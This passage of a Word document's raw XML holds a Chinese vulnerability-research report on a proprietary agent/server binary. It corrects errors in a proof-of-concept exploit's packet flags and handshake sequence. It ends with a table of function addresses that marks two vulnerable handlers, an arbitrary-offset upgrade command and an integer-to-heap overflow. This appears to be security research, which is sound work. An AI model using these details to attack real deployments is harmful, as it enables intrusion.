          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>, agent_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>server_hello_agent_id)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:p w14:paraId="518639F5">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="问题2cmdwanttalk-使用错误的-flags"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题2：CMD_WANT_TALK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用错误的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAC7418">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：POC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>flags=0x0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（bit0=1）发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CMD_WANT_TALK。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798EB9A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>正确</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：DataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阶段的路由规则要求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CMD_WANT_TALK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bit0=0（flags=0x0000）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B55BB">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// sub_1402D3DB0 路由逻辑：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_140E31820</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>a2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> CMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x6001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// bit0=0 AND CMD==WANT_TALK → ✓路由</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">                                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// bit0=1 AND CMD==WANT_TALK → ✗被丢弃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE27BCB">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># 当前（错误）：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>send(CMD_WANT_TALK, flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">, ...)   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># bit0=1 → 路由被跳过</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># 修正：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>send(CMD_WANT_TALK, flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x0000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">, ...)   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t># bit0=0 → 正确路由到 sub_1402D1580</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:p w14:paraId="5038D82F">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="问题3poc-对服务端初始化序列判断错误"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题3：POC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对服务端初始化序列判断错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F512C1">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：POC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待服务端发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CMD_VERSION(0x6010) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为"问候包"，实际上：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738E0C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CMD_VERSION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>客户端发给服务端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0049B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端发给客户端的初始包是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CMD_HELLO(0x3039)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F6B19C">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i104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4"/>
    <w:bookmarkEnd w:id="27"/>
    <w:p w14:paraId="590B4EEC">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="Xd7b8ce183e4a1e874df3474869348505e33732e"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>五、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附录：关键函数地址表</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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7"/>
        <w:gridCol w:w="2709"/>
        <w:gridCol w:w="4210"/>
      </w:tblGrid>
      <w:tr w14:paraId="0E1372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38CC24A">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="2658B327">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>函数名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="6F299831">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>职责</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5EC278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B45B58B">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x140ADC0B0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="5530E926">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>OCP接收回调</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="7E836696">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>TCP数据接收，队列查找，分发</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1252E2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25239E9">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x140ADB3E0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="5A7358EE">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>OCP发送</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="305C6985">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>发包并插入</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> c</w:t>
            </w:r>
            <w:bookmarkStart w:id="29" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="29"/>
            <w:r>
              <w:t xml:space="preserve">onn+392 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>队列</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5FC884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AB8588">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x140041910</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="64950303">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AgentCheck主分发</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="69F224D2">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>阶段1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CMD路由</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0811CD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D84DD1">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x140042D40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="2A4BD78D">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AgentCheck </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CMD工作线程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="05FB7D35">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>处理</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> CMD_VERSION </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7DDD7B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7FD2DA3">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x140043DC0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="3688427A">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AgentCheck工作线程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="18ED2F02">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>模式0/1/2，触发阶段切换</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2CE98D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13E3EE">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x140044D30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="3990DB99">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CMD_VERSION处理器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="66E1C58A">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本/鉴权，响应0x6009/0x6011</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="530E0B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3BCCAE8">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x1402D7940</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="6DFAC6BD">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>阶段切换函数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="0048CE0A">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册DataTransfer分发，发CMD_READY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="61C25B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9CDD270">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x1402D3DB0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="09EA932A">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DataTransfer主分发</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="54637197">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>n4路径路由，AgentTransfer.cpp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="39B9A9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85250E0">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x1402D1580</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="4A8F6C69">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DataTransfer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CMD分发器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="2F22CD2D">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WANT_TALK处理，其他CMD入队</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7BC956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1911EB0">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x14015B810</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="52A62675">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代理事件入队</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="22704532">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>按AgentID查代理表，构建工作项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52C6F9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851DCC">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x14015B3C0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="46A39365">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>工作线程调度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="6663E132">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从队列取项，调sub_140069FC0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3C1A02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5699744">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x140158830</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="000F1BCC">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代理表查找</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="6E9945B0">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>以AgentID查找已注册代理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="501294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97C6CCD">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x140BBA160</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="6AC53911">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>重传记录查找</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="338E8DDE">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RetransferRecord.cpp，n4=4路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0B2CD1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D3C6F42">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x14008A040</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="1C557D47">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VULN-01处理器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="0E1B3100">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CMD_UPGRADE，任意偏移</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="76ADC4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70A5BBC">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x1400A0EE0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="63B6991E">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VULN-02处理器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="63955AFB">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CMD_DATA，整数溢出→堆溢出</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="310B58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D7AA809">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x1413D6FC0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="61A54E17">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AgentCheck </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CMD表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="503BDF3F">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>12条目，阶段1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E72EF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9FD2E8">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t>0x1413DAxx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="74C67E37">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DataTransfer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CMD表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="0484AFE1">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>16字节条目，阶段3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="28"/>
    </w:tbl>
    <w:p w14:paraId="3C97F355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+中文标题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西文标题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+西文正文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中文正文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1D1F79F0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1D1F79F0"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="0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0F052A35"/>
    <w:rsid w:val="14531B4D"/>
    <w:rsid w:val="190478B9"/>
    <w:rsid w:val="19836A30"/>
    <w:rsid w:val="1A5B08D8"/>
    <w:rsid w:val="291C47AB"/>
    <w:rsid w:val="3B485E21"/>
    <w:rsid w:val="45DD5596"/>
    <w:rsid w:val="4F6C1BB7"/>
    <w:rsid w:val="5A2E5F69"/>
    <w:rsid w:val="5A44578C"/>
    <w:rsid w:val="5BA01FD3"/>
    <w:rsid w:val="5E695530"/>
    <w:rsid w:val="64DB4055"/>
    <w:rsid w:val="67674868"/>
    <w:rsid w:val="687234C5"/>
    <w:rsid w:val="6B4F5D3F"/>
    <w:rsid w:val="7F5923A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="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋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="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
